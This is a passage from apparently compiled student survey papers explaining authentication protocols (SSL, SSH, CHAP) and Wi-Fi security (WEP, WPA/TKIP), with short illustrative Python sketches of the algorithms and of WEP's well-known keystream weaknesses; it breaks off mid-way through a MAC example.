encrypting and decrypting data are generated; these keys are used only for that SSL
session [25]. Once the handshake is completed, application-layer data flows
encrypted across the unique SSL session. A digital certificate, issued by a Certificate
Authority (CA), can be assigned to the applications using SSL at either endpoint
[25]. Briefly, the steps in an SSL handshake are:
1. The browser sends a nonce and requests a secure session from the web server.
2. The web server sends its certificate, CA details, site information and a public key
to the browser.
3. The browser verifies the certificate and obtains the server's public key.
4. The browser sends a pre-master session key encrypted with the server's public
key.
5. The server decrypts the pre-master session key using its private key.
6. A secure connection is established after completing the above steps.
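As an illustration only, the sketch below replays steps 4 to 6 with a deliberately tiny textbook RSA key pair and a hash-based key derivation; the numbers and the derivation function are invented for the example and bear no resemblance to real TLS key sizes or its key-derivation function:

```python
# Toy model of the SSL pre-master-key exchange (steps 4-6 above).
# The RSA parameters are tiny textbook values; real TLS uses >= 2048-bit keys.
import hashlib

n, e, d = 3233, 17, 2753          # toy RSA modulus, public and private exponent

pre_master = b"\x07\x1c\x2a"      # browser's randomly chosen pre-master secret

# Step 4: the browser encrypts each byte with the server's public key (e, n).
encrypted = [pow(b, e, n) for b in pre_master]

# Step 5: the server decrypts with its private key (d, n).
decrypted = bytes(pow(c, d, n) for c in encrypted)

# Step 6: both sides derive the same session key from the shared secret.
session_key = hashlib.sha256(decrypted).digest()
print(decrypted == pre_master)
```

Because only the holder of the private key can recover the pre-master secret, an eavesdropper who sees the encrypted value cannot derive the session key.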
3.6.4 Limitations of TLS/SSL
TLS/SSL lacks support for UDP traffic because it requires a stateful connection.
Also, not all setups implement both server and client authentication. Lastly, using
TLS/SSL in tunnel mode can be expensive if the setup requires an external
certification authority to sign the digital certificates [26].
3.7
Secure Shell (SSH)
3.7.1 Introduction to SSH
SSH uses various methods to authenticate a remote user that is attempting to connect
to a particular host, and it works at the application layer of the OSI model. Rather
than transmitting the user's password in plaintext across the channel, the connecting
computer uses the host's public key to encrypt the password, making the
transmission much safer than with applications such as Telnet. SSH exchanges
public keys during the authentication process to ensure that the password is
encrypted, so that even if a man-in-the-middle or password sniffer manages to get
hold of the ciphertext, he or she will not be able to recover the plaintext easily
without the private key of the intended recipient.
3.7.2 SSH from a Historical Perspective
SSH made its first appearance in 1995. It was developed by a researcher at the
Helsinki University of Technology in Finland, which had been a regular victim of
password-sniffing attacks in early 1995; in response, the researcher produced SSH
for the university's use. During its beta phase SSH gained a great deal of publicity,
which suggested that it could become a commercial product. In July 1995 the
researcher released SSH-1 and made its source code available to the public, allowing
anyone to use and modify it freely. At the end of 1995, because of the massive
volume of support email he received, the researcher set up a company, SSH
Communications Security (SCS), to continue development of the SSH product.
However, numerous problems and limitations in SSH-1 were discovered as its
popularity skyrocketed, and they could not be fixed without losing backward
compatibility. This triggered the birth of SSH-2 in 1996, which uses new algorithms
and is not compatible with SSH-1. In February 1997, an Internet Draft was submitted
for the SSH-2 protocol.
In 1998, SSH-2 was released by SCS. However, it did not displace SSH-1, for two
reasons. First, SSH-2 lacked some useful and practical features of SSH-1. Second,
SSH-2 was not free to use except for qualifying educational institutions and
non-profit organizations. Even three years after its release, SSH-2's popularity had
not overtaken SSH-1's, even though SSH-2 provides a much more secure protocol
[27].
3.7.3 Public key authentication over SSH
This method uses public key infrastructure techniques to authenticate the user. The
process requires the server to know beforehand the details of the key that the user
intends to use. Once the user has chosen a public key, it is transmitted to the server,
which checks whether that key is in its list of permitted keys. If not, the
authentication fails and the connection is refused. Otherwise, the server uses the
chosen public key to encrypt a randomly generated 256-bit string and sends it back
to the user as a challenge [28]. On receiving the challenge, the user decrypts it with
the corresponding private key, combines the decrypted challenge with the session
identifier, and feeds the result to an MD5 function to generate a hash value, which is
sent back to the server. If this hash value matches the value the server has calculated
itself, the authentication is a success.
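The challenge-response exchange above can be sketched as follows; the toy RSA key pair, challenge length and session identifier are invented for illustration, and a real SSH-1 implementation would use full-size keys and a 256-bit challenge:

```python
# Sketch of SSH-1 public-key challenge-response (toy RSA, illustrative only).
import hashlib
import os

n, e, d = 3233, 17, 2753                 # toy RSA key pair; real keys are far larger
session_id = b"example-session-id"       # assumed known to both sides

# Server: encrypt a random challenge with the client's public key.
challenge = os.urandom(8)                # (real SSH-1 uses a 256-bit challenge)
encrypted = [pow(b, e, n) for b in challenge]

# Client: decrypt with the private key, then hash challenge + session id.
decrypted = bytes(pow(c, d, n) for c in encrypted)
client_hash = hashlib.md5(decrypted + session_id).digest()

# Server: compute the same hash over the original challenge and compare.
server_hash = hashlib.md5(challenge + session_id).digest()
print(client_hash == server_hash)
```

Only the holder of the private key can produce the matching hash, so the password never crosses the wire at all in this method.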
3.7.4 Rhost authentication
This method authenticates the machine rather than the user. A user on the client
machine may wish to access an account that is available on the server. The SSH
client first requests a connection to the server, and the server uses DNS to check the
hostname corresponding to the client's source IP address. The server then
authenticates the machine with two tests. The first test checks that the client machine
is listed as a trusted machine in the authorization rules; if it is found, authentication
continues, otherwise it is aborted and fails. The second test requires the server to
verify that the client is running a trusted program installed by the system
administrator of the client machine. It does this by checking that the client's
connection originates from a privileged port number (1-1023): since the client
machine can only use this range of ports with superuser privileges, a connection
from such a port is taken as evidence that a trusted program is in use, satisfying the
second rule [28].
Once these two rules have been confirmed, the server proceeds to verify that the
client has permission to access the particular account that the client user wishes to
use [28].
Of all the available authentication methods, this is the weakest, because it checks
only the client's host address [29]. In modern networks, IP addresses can be spoofed
easily, DNS can be poisoned, and users are often given superuser privileges, which
allows them to use any privileged port freely.
3.7.5 Password authentication over SSH
Password authentication over an SSH channel is the last resort that SSH uses to
authenticate users when the other authentication methods have failed [30]. It is
combined with public key techniques to ensure that the transmitted password is
encrypted and safe from man-in-the-middle attacks. The following is a simple
illustration of password-based SSH authentication, in which Alice is trying to
connect to a server at sunfire.comp.nus.edu.sg.
1. Alice keys in the host address "sunfire.comp.nus.edu.sg", the port number, her
username and her password.
2. sunfire.comp.nus.edu.sg acknowledges the request and sends its own public key
to Alice.
3. Alice looks into her list of trusted public keys and searches for the key of
sunfire.comp.nus.edu.sg.
3a. If the key is not found, SSH prompts Alice to decide whether the key from
sunfire.comp.nus.edu.sg should be added to her trusted list.
3b. If a matching public key is found in Alice's trusted list, she proceeds to Step 4.
4. Alice uses that public key from Sunfire to encrypt all her authentication details,
including the username and password. At the same time, Alice's computer sends a
copy of her public key to the Sunfire host.
5. Once Sunfire receives the encrypted authentication details and Alice's public key,
it decrypts the details using its own private key and checks the username and
password against its own database.
3.7.6 Host-Based authentication over SSH-2
The SSH-2 protocol removed SSH-1's Rhost authentication because of its insecurity,
but it includes another method known as "host-based" authentication [30].
Host-based authentication uses the client hostname instead of the client IP address,
which eliminates problems with clients that have dynamic IP addresses, clients
behind a proxy, and clients with more than one IP address. The authentication
process uses two identifiers, Nnet and Nauth: Nnet refers to the client name in the
authentication request, and Nauth refers to the name looked up through the client's
network address. If these two identifiers do not match, the authentication fails [30].
3.8
Challenge Handshake Authentication Protocol (CHAP)
3.8.1 Introduction to CHAP
Challenge Handshake Authentication Protocol (CHAP) is a three-way handshake
challenge-response protocol used periodically to verify that the identity of a peer is
still valid [31]. It uses the Message Digest 5 (MD5) hashing scheme to protect the
responses and is used by various network access servers and client vendors. Remote
access clients that use CHAP can be authenticated by any server running Routing
and Remote Access that supports CHAP, because CHAP requires the server to store
a reversibly encrypted form of the password [32].
CHAP Challenge and Response Process [31]:
1. The authenticator sends a "challenge" message to the peer after a link has been
established.
2. The peer uses a one-way hash function to calculate a value and sends it back to
the authenticator.
3. The received value is compared with the authenticator's own calculation of the
expected hash value; the authentication is acknowledged if the values match,
otherwise the connection should be terminated.
4. The authenticator periodically sends a new challenge to the peer at random
intervals, and Steps 1 to 3 are repeated for every challenge.
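In RFC 1994, the one-way hash in step 2 is MD5 over the packet Identifier, the shared secret and the challenge, concatenated in that order. The sketch below follows that calculation; the secret and identifier values are made-up examples:

```python
# Sketch of the CHAP MD5 response calculation (RFC 1994 style):
# response = MD5(Identifier || shared secret || challenge).
import hashlib
import os

secret = b"shared-secret"            # example secret known to both sides
identifier = 7                       # CHAP packet Identifier (one octet)
challenge = os.urandom(16)           # authenticator's random challenge

def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()

# Step 2: the peer computes its response.
response = chap_response(identifier, secret, challenge)

# Step 3: the authenticator recomputes the expected value and compares.
expected = chap_response(identifier, secret, challenge)
print(response == expected)
```

Because each challenge is fresh and random, a captured response cannot be replayed against a later challenge.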
3.8.2 CHAP from a Historical Perspective
CHAP was defined in 1996 in RFC 1994 [33]. Microsoft's renditions, MS-CHAPv1
and MS-CHAPv2, followed in 1998 (RFC 2433) [34] and 2000 (RFC 2759) [35]
respectively; Microsoft's versions were extensions of and improvements to the
original CHAP. Microsoft Challenge Handshake Authentication Protocol Version 1
is an encrypted password authentication protocol that is not reversible [36], while
Version 2 provides stronger security for remote access connections than MS-CHAP
Version 1 [37]. A general description of the differences between MS-CHAPv1 and
MS-CHAPv2 [38] is shown below:
MS-CHAP Version 1 vs. MS-CHAP Version 2:
• Negotiation: MS-CHAPv1 begins CHAP with the algorithm value 0x80;
MS-CHAPv2 begins CHAP with the algorithm value 0x81.
• Challenge: In MS-CHAPv1, an 8-byte challenge is sent by the server. In
MS-CHAPv2, a 16-byte challenge is sent by the server, which the client uses to
create a hidden 8-byte challenge value.
• Response: In MS-CHAPv1, the client sends a 24-byte LANMAN and NT response
to the 8-byte challenge. In MS-CHAPv2, the client sends the 16-byte peer challenge
it used to create the hidden 8-byte challenge, together with the 24-byte NT response.
• Result: In MS-CHAPv1, the server sends a SUCCESS or FAILURE response. In
MS-CHAPv2, the server sends a SUCCESS or FAILURE response and piggybacks
an Authenticator Response to the 16-byte peer challenge.
• Decision: In both versions, the client decides whether to continue the connection
based on the SUCCESS or FAILURE response. Additionally, in MS-CHAPv2, if the
Authenticator Response is not the value the client expects when it checks it, the
connection is disconnected.
4
Conclusions
In conclusion, authentication methods are needed everywhere in our daily lives for
authenticating different users and systems, and the methods we have explored above
remain in ubiquitous use today. We have seen how authentication methods have
evolved over the years to improve the authentication of different users and systems.
We have now reached an age in which services are multiplying rapidly and
processes are becoming more complex, so it is essential to use new sets of
sophisticated algorithms to implement newer authentication methods and security
measures that safeguard against unauthorized access and potential attacks. While
implementing newer authentication methods, it is important to ensure that sensitive
data are neither lost nor visible to unauthorized people, and that the trustworthiness
of data is maintained.
References
1. About Passwords, http://media.techtarget.com/searchSecurity/downloads/HackingforDummiesCh07.pdf
2. The History of Passwords, http://www.onlinepasswordgenerator.net/the-history-of-passwords.php
3. Introduction and Background of PKI, http://www.pdfsearchbox.com/The-Alliance-PKI-Initiative.html
4. Public Key Infrastructure Details, http://searchsecurity.techtarget.com/definition/PKI
5. History of PKI, www.saylor.org/site/wp-content/.../03/Public-key-infrastructure.pdf
6. Public Key Cryptography (PKC) History, http://www.livinginternet.com/i/is_crypt_pkc_inv.htm
7. SANS Information on Authentication, http://www.sans.org/reading_room/whitepapers/authentication/overview-authentication-methods-protocols_118
8. Kerberos Overview, Authentication Service for Open Network Systems, http://www.cisco.com/en/US/tech/tk59/technologies_white_paper09186a00800941b2.shtml
9. Frequently Asked Questions about the MIT Kerberos Consortium, http://www.kerberos.org/about/FAQ.html
10. Kerberos Authentication History, http://www.theworldjournal.com/special/nettech/news/kerberos.htm
11. Sharing a Secret: How Kerberos Works, http://www.computerworld.com/computerworld/records/images/pdf/kerberos_chart.pdf
12. Kerberos Authentication Protocol, http://www.zeroshell.net/eng/kerberos/Kerberos-definitions/#1.3.8
13. Risk Assessment of Authentication Protocol: Kerberos, http://www.scribd.com/doc/59497058/Risk-Assessment-of-Authentication-Protocol-Kerberos
14. Protect Yourself against Kerberos Attacks, http://oreilly.com/pub/a/windows/excerpt/swarrior_ch14/index1.html
15. The NTLM Authentication Protocol and Security Support Provider, http://davenport.sourceforge.net/ntlm.html
16. Microsoft NTLM, http://msdn.microsoft.com/en-us/library/aa378749%28VS.85%29.aspx
17. NTLM, http://www.webopedia.com/TERM/N/NTLM.html
18. Protect against Weak Authentication Protocols and Passwords, http://www.windowsecurity.com/articles/Protect-Weak-Authentication-Protocols-Passwords.html
19. Authentication Types, http://www.tech-faq.com/authentication-types.html
20. Understanding NTLM, http://cybernicsecurity.com/index.php/authentication/4-understanding-ntlm
21. Managing Identity Information between LDAP Directories and Exchange Server 2010, http://allcomputers.us/windows_server/managing-identity-information-between-ldap-directories-and-exchange-server-2010.aspx
22. Authentication Using LDAP, http://tldp.org/HOWTO/LDAP-HOWTO/authentication.html
23. Windows IT Pro, LDAP Limitations, http://www.windowsitpro.com/article/ldap/ldap-limitations
24. Windows Server TechCenter, http://technet.microsoft.com/en-us/library/cc784450(WS.10).aspx
25. iSeries Information Center V5R3, http://publib.boulder.ibm.com/infocenter/iseries/v5r3/index.jsp?topic=%2Frzain%2Frzainhistory.htm
26. Limitations and Differences between TLS/SSL as VPN Solution, http://olemartin.com/projects/VPNsolutions.pdf
27. O'Reilly Definitive Guide on History of SSH, http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch01_05.htm
28. O'Reilly Definitive Guide on SSH-1, http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch03_04.htm
29. Type of SSH Authentication, http://www.psc.edu/general/net/ssh/authentication.php
30. O'Reilly Definitive Guide on SSH-2, http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch03_05.htm#ch03-80181
31. Challenge Handshake Authentication Protocol for PPP, http://www.javvin.com/protocolCHAP.html
32. Microsoft TechNet: Windows Server TechCenter Library, http://technet.microsoft.com/en-us/library/cc757631(WS.10).aspx
33. PPP Challenge Handshake Authentication Protocol, http://tools.ietf.org/html/rfc1994
34. MS PPP CHAP Version 1 History, http://tools.ietf.org/html/rfc2433
35. MS PPP CHAP Version 2 History, http://tools.ietf.org/html/rfc2759
36. Microsoft TechNet, MS-CHAPv1 Definition, http://technet.microsoft.com/en-us/library/cc758984(WS.10).aspx
37. Microsoft TechNet, MS-CHAPv2 Definition, http://technet.microsoft.com/en-us/library/cc739678(WS.10).aspx
38. Cryptanalysis of Microsoft's PPTP Authentication Extensions (MS-CHAPv2), http://www.schneier.com/paper-pptpv2.html
Different strategies used for securing IEEE 802.11 systems;
the strengths and the weaknesses.
Cheng Chang, Yu Gao
National University of Singapore
Abstract. Different wireless security protocols have been used over time to
establish secured wireless networks. With an understanding of the underlying
mechanism of each protocol, we cross-compare the protocols with one another
to reach a final evaluation of each individual protocol; in this way, both
strengths and weaknesses can be shown clearly. As their history shows, some
of the protocols are modifications of previous ones, while others use
completely new ideas to achieve a new standard of security. All of the above
is discussed in detail in the following paper.
Keywords: wireless, security, WEP, WPA
1
Introduction
The invention of wireless networking makes it possible for remote users to
access the Internet almost anywhere, and the convenience of such access
caused a dramatic shift in the development of the laptop. However, the chance
of a connection being intercepted while surfing the Internet is much higher
than over a wired connection, so a new secured network protocol became
essential. In the following paper, these protocols, and the underlying
mechanisms that help make connections more secure, are discussed in detail.
At the same time, their strengths and weaknesses are evaluated through
comparisons between the different protocols, based on the underlying
structures, techniques and methodologies each protocol uses.
2
Wired Equivalent Privacy (WEP)
Although the IEEE 802.11 family of wireless standards dates back to 1997,
wireless networks were not secured until the first widely deployed protection
method was introduced in 1999: Wired Equivalent Privacy (WEP). The
intention of the WEP algorithm is to provide confidentiality and integrity for
otherwise unsecured wireless networks.
2.1
Algorithm Details:
Confidentiality:
WEP uses RC4, a stream cipher that is widely used in popular protocols such
as Secure Sockets Layer (SSL).
Mechanism behind RC4:
Step 1: the key-scheduling algorithm (KSA) initializes the 256-byte state
array S from the secret key, which shall be between 40 and 256 bits long. [1]
The algorithm is as follows:
for i from 0 to 255
S[i] := i
endfor
j := 0
for i from 0 to 255
j := (j + S[i] + key[i mod keylength]) mod 256
swap values of S[i] and S[j]
endfor
Step 2: the pseudo-random generation algorithm (PRGA). For as long as
output is needed, the PRGA outputs one byte of the key stream per iteration
while updating the state. In each iteration, the PRGA increments "i", adds
S[i] to j, swaps the values of S[i] and S[j], and finally outputs the byte
S[(S[i] + S[j]) mod 256]. [2]
The algorithm is as follows:
i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
K := S[(S[i] + S[j]) mod 256]
output K
endwhile
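The two pseudocode fragments above combine into the following runnable Python sketch of RC4, checked against the well-known "Key"/"Plaintext" test vector:

```python
# RC4: key scheduling (KSA) plus keystream generation (PRGA),
# combined into a simple encrypt/decrypt routine (XOR with keystream).

def rc4(key: bytes, data: bytes) -> bytes:
    # KSA: initialize and scramble the 256-byte state array S.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # PRGA: generate one keystream byte per data byte and XOR it in.
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

ciphertext = rc4(b"Key", b"Plaintext")
print(ciphertext.hex().upper())   # BBF316E8D940AF0AD3
```

Because encryption is a plain XOR with the keystream, applying rc4 with the same key to the ciphertext returns the original plaintext.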
Integrity:
Cyclic redundancy check (CRC) is an error-detecting code designed to detect
accidental changes to raw computer data, and is commonly used in digital
networks and storage devices such as hard disk drives. [3]
Mechanism behind CRC-32 checksum:
The data are checked in fixed-length blocks, with a check length that depends
on the divisor that is selected. First, append to the original data a number of
zero bits equal to one less than the length of the divisor. Starting from the
leftmost 1, perform binary long division (an XOR at each step) until the
original part of the data is fully divided. The remainder of this long division
is then appended to the original data in place of the zeros to form the checked
data.
For example, dividing 00011010101110 (with three appended zero bits) by
the divisor 1001:

00011010101110 000   <--- input left-shifted by 3 bits
   1001              <--- divisor
00001000101110 000   <--- result
    1001             <--- divisor ...
00000001101110 000
       1001
00000000100110 000
        1001
00000000000010 000
            10 01
-----------------
00000000000000 010   <--- remainder (3 bits)
In this way, the checked data become longer than the original
"00011010101110", namely "00011010101110 010"; the last three bits are the
checksum. On the receiver side, the received data are checked against the
same divisor 1001.
For example:

00011010101110 010   <--- received input, left-shifted by 3 bits
   1001              <--- divisor
00001000101110 010   <--- result
    1001             <--- divisor ...
00000001101110 010
       1001
00000000100110 010
        1001
00000000000010 010
            10 01
-----------------
00000000000000 000   <--- remainder (3 bits)
When the remainder computed on the receiver side is 0, it means no error
was detected during transmission.
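The two worked divisions above can be reproduced with a few lines of Python; the bit strings are the ones from the example, and the short divisor 1001 stands in for the much longer CRC-32 polynomial:

```python
# Modulo-2 long division, as used by CRC: repeatedly XOR the divisor
# under the leftmost remaining 1 bit, then return the trailing remainder.

def mod2_div(bits: str, divisor: str) -> str:
    """Return the remainder of modulo-2 (XOR) long division."""
    n = len(divisor)
    work = list(bits)
    for i in range(len(work) - n + 1):
        if work[i] == "1":
            for j in range(n):               # XOR the divisor in at position i
                work[i + j] = str(int(work[i + j]) ^ int(divisor[j]))
    return "".join(work[-(n - 1):])          # last n-1 bits are the remainder

data, divisor = "00011010101110", "1001"
checksum = mod2_div(data + "000", divisor)   # sender: append 3 zero bits
print(checksum)                              # 010
print(mod2_div(data + checksum, divisor))    # 000 -> no error detected
```

The sender divides the data with appended zeros to get the checksum; the receiver divides the data with the checksum attached and expects a zero remainder.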
2.2
Authentication Details:
Open system:
In Open System authentication, the client of the WLAN does not need to give
his or her password and username to the Access Point; as a result, all clients
are able to associate with the Access Point without any authentication. Any
checking of credentials occurs only after the client accesses the Access Point,
when the user has to enter the corresponding username and password into the
system in order to use it.
Shared key:
In Shared Key authentication, authentication takes place as a challenge and
response between server and client:
1. The client sends an authentication request to the Access Point.
2. The Access Point replies with a challenge.
3. The client encrypts the challenge with the configured WEP key, and sends it
back in another authentication request.
4. The Access Point decrypts the answer. If it matches the challenge, the
Access Point admits the connection and sends back a positive reply.
After the connection is established, the pre-shared WEP key is also used for
encrypting the data frames using RC4. [4]
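The handshake above leaks information to an eavesdropper: whoever captures the plaintext challenge and the encrypted response learns the keystream for that IV, and in WEP the attacker may then reuse the same IV. The sketch below illustrates this with a stand-in keystream (derived here from MD5 purely for the demonstration; real WEP would use RC4):

```python
# Demonstration of the shared-key handshake weakness: challenge XOR
# response reveals the keystream, letting an attacker answer a fresh
# challenge without ever knowing the WEP key.
import hashlib
import os

def keystream(key: bytes, iv: bytes, length: int) -> bytes:
    # Stand-in for RC4(iv || key); MD5 is used here only for the demo.
    return hashlib.md5(iv + key).digest()[:length]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

wep_key, iv = b"secret-wep-key", b"\x01\x02\x03"

# Observed handshake: the AP's challenge and the client's encrypted response.
challenge = os.urandom(16)
response = xor(challenge, keystream(wep_key, iv, 16))

# The eavesdropper recovers the keystream without knowing the key ...
recovered = xor(challenge, response)

# ... and can now answer a fresh challenge by reusing the same IV.
new_challenge = os.urandom(16)
forged = xor(new_challenge, recovered)
print(xor(forged, keystream(wep_key, iv, 16)) == new_challenge)
```

This is the weakness discussed under the authentication-phase flaws later in this section: a single observed handshake is enough to impersonate a legitimate client.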
2.3
Evaluation:
Strength:
Major strength:
1. Earlier stream ciphers used linear feedback shift registers (LFSRs). Since
these registers are only efficient in hardware, their performance in software
is not good. In contrast, RC4 does not use LFSRs: with simple byte
manipulations it performs well in software, using 256 bytes of memory for
the state array and k bytes for the key, and the reduction of a value modulo
256 can be replaced by a bitwise AND with 255. [5]
2. Since RC4 is a stream cipher, it is better than a block cipher at preventing
the BEAST attack on TLS 1.0. This is an important advantage that follows
from the methodology itself: because a block cipher encrypts in fixed-length
blocks, it is easier for BEAST to exploit it and steal user information.[6]
Other strength:
1. Cyclic redundancy checks are cheap to implement and accurate, and can
easily be realised at the hardware level. With simple bit manipulation they
record the data necessary for error detection, for example to detect errors on
noisy channels.
Weakness:
Major flaws:
• RC4 does not take a separate nonce alongside the key. If multiple streams
are encrypted under the same key, the nonce should be combined with the
key by a well-designed mixing algorithm, but WEP has no such algorithm:
it simply concatenates a 24-bit initialization vector (IV) with the key and
uses the result as the RC4 key, which is not secure. Moreover, because the
IV is only 24 bits, it is too short, making it easy for attackers to exploit. [7]
• Since RC4 is a stream cipher, the same traffic key must never be used
twice; the IV exists precisely to prevent key reuse, but it is not long enough.
In a busy network, the same traffic key is highly likely to recur: with a
24-bit IV there is a 50% probability that an IV will repeat after about 5000
packets.
• In addition, because RC4 is a stream cipher, it is more malleable than
common block ciphers, and it is vulnerable to a bit-flipping attack if it is not
used together with a strong message authentication code.
Actual events:
In August 2001, Scott Fluhrer, Itsik Mantin, and Adi Shamir (FMS)
published a cryptanalysis of WEP that exploits the way the RC4 cipher and
IV is used in WEP, resulting in a passive attack that can recover the RC4
key after eavesdropping on the network. Depending on the amount of
network traffic, and thus the number of packets available for inspection, a
successful key recovery could take as little as one minute. If an insufficient
number of packets are being sent, there are ways for an attacker to send
packets on the network and thereby stimulate reply packets which can
then be inspected to find the key. The attack was soon implemented, and
automated tools have since been released. It is possible to perform the
attack with a personal computer, off-the-shelf hardware and freely
available software such as aircrack-ng to crack any WEP key in minutes. [8]
FMS attack algorithm overview:
Step 1: At the start of the KSA, the IV is sent in clear text, and the RC4 key
is K = IV | K-WEP.
Step 2: Discover weak IVs for which the KSA is "resolved", so that the
output leaks information about the key itself. Each weak IV found allows
one byte of K to be guessed; on average about 60 weak IVs are needed per
byte to recover K.
Step 3: When trying to recover byte K[A], the resolved condition is
SI[1] < I and SI[1] + SI[SI[1]] = I + A
after I steps, and it still holds after I + A steps with high probability. Weak
IVs have the form (A+3, n-1, X). [8]
Other flaws:
• In RC4 key generation:
The key used for WEP is not long enough; WEP-40, for example, has a key
length of only 40 bits. In addition, keys are normally entered as ASCII text,
which has far fewer variations: only a small percentage of 40-bit numbers
have an ASCII representation. This makes WEP even less secure.
• In cyclic redundancy check:
This algorithm is specifically designed to detect the kinds of errors that
normally occur on communication channels, and in itself it is efficient,
simple and accurate. Against an intentional attack, however, it does not
protect the user: it is easy to manipulate data so that it keeps the same cyclic
redundancy check value, or to recalculate the check value to match the
corrupted data frames. [9]
• In the authentication phase:
Shared-key authentication is less secure than the open system. Even though
it checks the client's identity whenever the client wants to connect to the
Access Point, the key stream may easily be captured by a third party during
the handshake. It is therefore better to use open authentication rather than
shared-key authentication, even though open system authentication is itself
a weak authentication method.
2.4
Minor Modifications
WEP2:
Because the initialization vector was so short that stream cipher attacks were
easy to launch, WEP2 extended both the IV and the key itself to 128 bits,
compared with 24 bits and 40 bits in the previous version of WEP; the
extended values make a longer key for RC4. [10]
In doing so, WEP2 helps to eliminate the duplicate-IV deficiency and to
deter brute-force key attacks to some extent.
At the same time, since the keys are longer, the number of possible ASCII
combinations also increases. However, just as in the previous version, the
ASCII combinations remain a small fraction of the possible bit combinations
of the key, so much of the keyspace is wasted.
WEP+:
Some plaintext initialization vectors statistically leak the pre-shared keys;
these are referred to as weak IVs. WEP+ filters out the weak IVs so that none
remain for attackers to use in cracking WEP+. [11]
However, this works only when WEP+ is used at both ends of the wireless
connection, which can hardly be enforced. At the same time, WEP+ solves
only this particular statistical flaw in the encryption process; other statistical
flaws still exist with WEP+.
3
Wi-Fi Protected Access (WPA)
Since Wired Equivalent Privacy (WEP) has various serious weaknesses
[12], the Wi-Fi Alliance designed security certification programs and two
security protocols to replace the older WEP algorithm used for IEEE 802.11
wireless networks. The first security protocol, Wi-Fi Protected Access
(WPA), was intended as an intermediate measure to replace WEP, and it
implements the majority of the IEEE 802.11i standard. WPA also includes
the Temporal Key Integrity Protocol (TKIP) to replace WEP's old 40-bit or
128-bit encryption key, which had to be entered manually on wireless access
points and devices and never changed [13].
3.1
Temporal Key Integrity Protocol (TKIP)
Background:
As a security protocol used in the IEEE 802.11 wireless networking standard, TKIP was designed by the IEEE 802.11i task group and the Wi-Fi Alliance as a solution to replace WEP without requiring upgrades of the legacy hardware, which would otherwise have left Wi-Fi networks without viable link-layer security [14].
Mechanisms:
TKIP and the related WPA standard implement three new security features to address the security problems encountered in WEP-protected networks:
• Firstly, TKIP implements a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 initialization. WEP, in comparison, merely concatenated the initialization vector to the root key and passed this value to the RC4 routine, which permitted the vast majority of the RC4-based WEP related-key attacks [15].
• Secondly, a sequence counter is implemented to protect against replay attacks. The access point rejects packets that are received out of order.
• Finally, a 64-bit Message Integrity Check (MIC) is implemented in TKIP [16].
TKIP uses RC4 as its cipher in order to be able to run on legacy WEP hardware with minor upgrades. It also provides a rekeying mechanism and ensures that every data packet is sent with a unique encryption key.
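The WEP construction that TKIP's key mixing replaces can be sketched as follows (a minimal RC4 implementation for illustration only; real WEP frames also carry an ICV and other framing). Because WEP simply prepends the 24-bit IV to the root key, any two frames that reuse an IV are encrypted with an identical keystream, and XORing their ciphertexts cancels the keystream entirely:

```python
def rc4_keystream(key: bytes, n: int) -> bytes:
    """Generate n bytes of RC4 keystream: KSA then PRGA."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out, i, j = [], 0, 0
    for _ in range(n):                        # pseudo-random generation
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)

root_key = b"\x01\x02\x03\x04\x05"            # 40-bit WEP root key
iv       = b"\xaa\xbb\xcc"                    # 24-bit IV, sent in the clear

def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    # WEP's per-packet key is the plain concatenation IV || root key
    ks = rc4_keystream(iv + key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))

p1, p2 = b"first frame ", b"second frame"
c1, c2 = wep_encrypt(iv, root_key, p1), wep_encrypt(iv, root_key, p2)

# Reused IV -> identical keystream -> ciphertext XOR equals plaintext XOR.
xor_of_ct = bytes(a ^ b for a, b in zip(c1, c2))
xor_of_pt = bytes(a ^ b for a, b in zip(p1, p2))
assert xor_of_ct == xor_of_pt
```

TKIP's mixing function avoids this by deriving a fresh, unrelated per-packet key from the root key and IV instead of concatenating them.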
3.2
Message Integrity Check:
• In order to prevent an attacker from capturing, altering and/or resending data packets, a message integrity check (MIC) has been included in WPA.
• The MIC replaces the cyclic redundancy check (CRC) used in the WEP standard, and it provides a stronger data integrity guarantee for the handled packets than the CRC did with its Integrity Check Value (ICV) [17].
• A MIC, also known by the term message authentication code (MAC), is the information used to authenticate a message [18].
• The MIC algorithm (or keyed hash function) uses a secret key together with an arbitrary-length message for the purpose of authentication. This protects the integrity and authenticity of the message's data by allowing verifiers to detect changes in the message content.
• Cryptographic primitives such as cryptographic hash functions or block cipher algorithms can be used to construct MIC or MAC algorithms. However, many of the fastest MAC algorithms, such as UMAC and VMAC, are constructed based on universal hashing [19].
MAC Example:
In this example, the sender of a message runs it through a MAC algorithm to
produce a MAC data tag. The message and the MAC tag are then sent to the
receiver. The receiver in turn runs the message portion of the transmission
through the same MAC algorithm using the same key, producing a second
MAC data tag. The receiver then compares the first MAC tag received in the
transmission to the second generated MAC tag. If they are identical, the
receiver can safely assume that the integrity of the message was not
compromised, and the message was not altered or tampered with during
transmission [20].
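This flow can be sketched with Python's standard hmac module (an illustration of the generic MAC pattern only; TKIP's actual MIC, called Michael, is a different and much lighter algorithm, so HMAC-SHA256 here is a stand-in):

```python
import hmac
import hashlib

secret_key = b"shared-secret-key"            # known only to sender and receiver

def mac_tag(key: bytes, message: bytes) -> bytes:
    """Compute a MAC tag over the message (HMAC-SHA256 as a stand-in MAC)."""
    return hmac.new(key, message, hashlib.sha256).digest()

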